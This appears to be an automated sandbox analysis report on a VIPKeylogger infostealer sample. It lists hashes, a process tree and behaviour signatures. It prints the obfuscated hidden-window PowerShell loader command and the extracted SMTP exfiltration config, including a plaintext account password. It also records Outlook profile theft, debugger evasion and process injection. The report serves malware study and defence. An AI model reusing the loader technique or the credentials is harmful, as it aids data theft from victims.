Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 01:37
Static task
static1
Behavioral task
behavioral1
Sample
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Udlaanslofterne/Incuss.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Udlaanslofterne/Incuss.ps1
Resource
win10v2004-20241007-en
General
-
Target
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe
-
Size
859KB
-
MD5
de02502f79bc183714a9dfe879831170
-
SHA1
c1fd975e0df663fd49e86ae1453d0ad3eccacea8
-
SHA256
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718
-
SHA512
c921e2e02ed0969ad66ae503e3cc83d0e2a3c3d6d43814c8b31c3b8606cde77e6f39c9a4b41088c0718b182a84dc29cae5f609dff872e98dcd00ef28c58b6415
-
SSDEEP
12288:l9LVa31WR5y/seQ/33WcLvfLn/ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0maD:/D5y/+/vfD/+alCJmvulW6Nd0vD
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.fr - Port:
587 - Username:
[email protected] - Password:
Rajahsouthfruits5 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4396 powershell.exe 396 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 16 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 23 2580 msiexec.exe 24 1700 msiexec.exe 29 2580 msiexec.exe 30 1700 msiexec.exe 32 1700 msiexec.exe 33 2580 msiexec.exe 35 2580 msiexec.exe 36 1700 msiexec.exe 39 1700 msiexec.exe 40 2580 msiexec.exe 46 2580 msiexec.exe 52 2580 msiexec.exe 56 1700 msiexec.exe 62 1700 msiexec.exe 68 2580 msiexec.exe 70 1700 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 45 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 2580 msiexec.exe 1700 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 396 powershell.exe 4396 powershell.exe 2580 msiexec.exe 1700 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 4396 powershell.exe 4396 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 396 powershell.exe 2580 msiexec.exe 1700 msiexec.exe 2580 msiexec.exe 1700 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 396 powershell.exe 4396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeIncreaseQuotaPrivilege 396 powershell.exe Token: SeSecurityPrivilege 396 powershell.exe Token: SeTakeOwnershipPrivilege 396 powershell.exe Token: SeLoadDriverPrivilege 396 powershell.exe Token: SeSystemProfilePrivilege 396 powershell.exe Token: SeSystemtimePrivilege 396 powershell.exe Token: SeProfSingleProcessPrivilege 396 powershell.exe Token: SeIncBasePriorityPrivilege 396 powershell.exe Token: SeCreatePagefilePrivilege 396 powershell.exe Token: SeBackupPrivilege 396 powershell.exe Token: SeRestorePrivilege 396 powershell.exe Token: SeShutdownPrivilege 396 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeSystemEnvironmentPrivilege 396 powershell.exe Token: SeRemoteShutdownPrivilege 396 powershell.exe Token: SeUndockPrivilege 396 powershell.exe Token: SeManageVolumePrivilege 396 powershell.exe Token: 33 396 powershell.exe Token: 34 396 powershell.exe Token: 35 396 powershell.exe Token: 36 396 powershell.exe Token: SeIncreaseQuotaPrivilege 4396 powershell.exe Token: SeSecurityPrivilege 4396 powershell.exe Token: SeTakeOwnershipPrivilege 4396 powershell.exe Token: SeLoadDriverPrivilege 4396 powershell.exe Token: SeSystemProfilePrivilege 4396 powershell.exe Token: SeSystemtimePrivilege 4396 powershell.exe Token: SeProfSingleProcessPrivilege 4396 powershell.exe Token: SeIncBasePriorityPrivilege 4396 powershell.exe Token: SeCreatePagefilePrivilege 4396 powershell.exe Token: SeBackupPrivilege 4396 powershell.exe Token: SeRestorePrivilege 4396 powershell.exe Token: SeShutdownPrivilege 4396 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeSystemEnvironmentPrivilege 4396 powershell.exe Token: SeRemoteShutdownPrivilege 4396 powershell.exe Token: SeUndockPrivilege 4396 powershell.exe Token: SeManageVolumePrivilege 4396 powershell.exe Token: 33 4396 powershell.exe Token: 34 4396 powershell.exe Token: 35 4396 powershell.exe Token: 36 4396 powershell.exe Token: SeDebugPrivilege 2580 msiexec.exe Token: SeDebugPrivilege 1700 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exepowershell.exepowershell.exedescription pid process target process PID 1100 wrote to memory of 4396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 1100 wrote to memory of 4396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 1100 wrote to memory of 4396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 1100 wrote to memory of 396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 1100 wrote to memory of 396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 1100 wrote to memory of 396 1100 9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe powershell.exe PID 396 wrote to memory of 2580 396 powershell.exe msiexec.exe PID 396 wrote to memory of 2580 396 powershell.exe msiexec.exe PID 396 wrote to memory of 2580 396 powershell.exe msiexec.exe PID 396 wrote to memory of 2580 396 powershell.exe msiexec.exe PID 4396 wrote to memory of 1700 4396 powershell.exe msiexec.exe PID 4396 wrote to memory of 1700 4396 powershell.exe msiexec.exe PID 4396 wrote to memory of 1700 4396 powershell.exe msiexec.exe PID 4396 wrote to memory of 1700 4396 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe"C:\Users\Admin\AppData\Local\Temp\9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD576b2de4276a82861ed2fc9622aca4532
SHA1121d53d4ccd29ff917c424c703a718f4ce811172
SHA256a5d281814ab7745a410c2de4e66244f253662f3c78fdc0d2a280632afab807e4
SHA512de2758ac45fd6d48008c9ad0f58e71d064e6284f8665cd09794f9d1a6d6c2747ed7c9be6f6a784c530b72290c0de015849e9a650e2ddd7172dda1dba79562605
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5cdd27124c0e1e13dcf66597be9948904
SHA1d26fa0a9f09a93884cc382301d79967e682fed5a
SHA2560f6a889e9a7fc56700a591d25aa0da298e35e2279f9248058b7ac591b8208b60
SHA51291440f29eed46d04e3acd24077850c670bbd07c0123f9472472fae68b11592d6b72fc2623b25e0870006021e69b4c4a9fe0b4f79bd733e91728b7d8ebc2a6206
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD54179e1fbce8bf26920f292c41400d9ff
SHA1216c29372a8ddcce10c91d3e9ca6e5bd40521428
SHA25682a3b3ee5a8901bd8b86553d2f4ee3e3f53fed851ac58dcfb81c26d10652273a
SHA5126aa71e17871de33406d38e45b076f50d0fe216c5a8d18e19cc3e030ac6cd28018aa7523d39040a9b1190f9917e6f4a16bbd69b8296644ed113a86b46a28f451d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5619b6be62885716d42865135cb4de784
SHA1a836429ae1e3749add7a1401d2bb468fa172b16c
SHA256077bfc716d67ebb725b110bce9a9c97bcfc3ac0e2c17469ff69f1c49028ad7ea
SHA5129a0544d31669520f2963bb06d940b62cc67845fa7d10e664ec9f7450bed82fb74336db2f1870945913b07efc384cff8e560304c0ee0a18408c086268e554e496
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD52df4afcc5bfdfe1f991f1550295b8788
SHA1d975f99631cf9df3a5bb44f421edf6a306db604d
SHA2564216fa5b963b29cade01fe310e31bcac459800b306d04cff097dd42b90c7059c
SHA512a7f19383dadfd91a3f9acdf400976db58bd819633f8c6b584da52d532f018751e5274bf176b772b29ee4ca582382e0fc00804bc9da7265ef99da4b9a4ac8844f
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD5f9bb610fdaf3e9fb1b4faa9ffddfab51
SHA1b0858761694b149c52d79d915d24d6d8fe161d14
SHA2569aaa17344e82a1134ff2b6c6e1eee773f703fd9f110b9b58fdfb87824f5def78
SHA51234f0f7ce7e4cbeb1ce0b699cfc97e5f6619dcd238fba0d9b30645d4fbc4ad5d97149355703568484b5110c621acd8eb1a0fb748359d4473cd7bf4b85235def54
-
Filesize
314KB
MD57a5b44360c380432ececa4c843d48cda
SHA13ca537abbe8f574c6a619f738dc8ab3bcb7e26b5
SHA25672b4863e0a3b4bfae49943812c29cf0b52415569ac5a3a0cc41e7a15060cdaf0
SHA512b882a08e1fa834e29a2a7dfb719c9a0d60acd7d97cf5958f1541313ff15bb66b8ae7adcfeabcf4bc35935d6b58e035c17acfe0a199a7ad69dad2c48e37dd74c8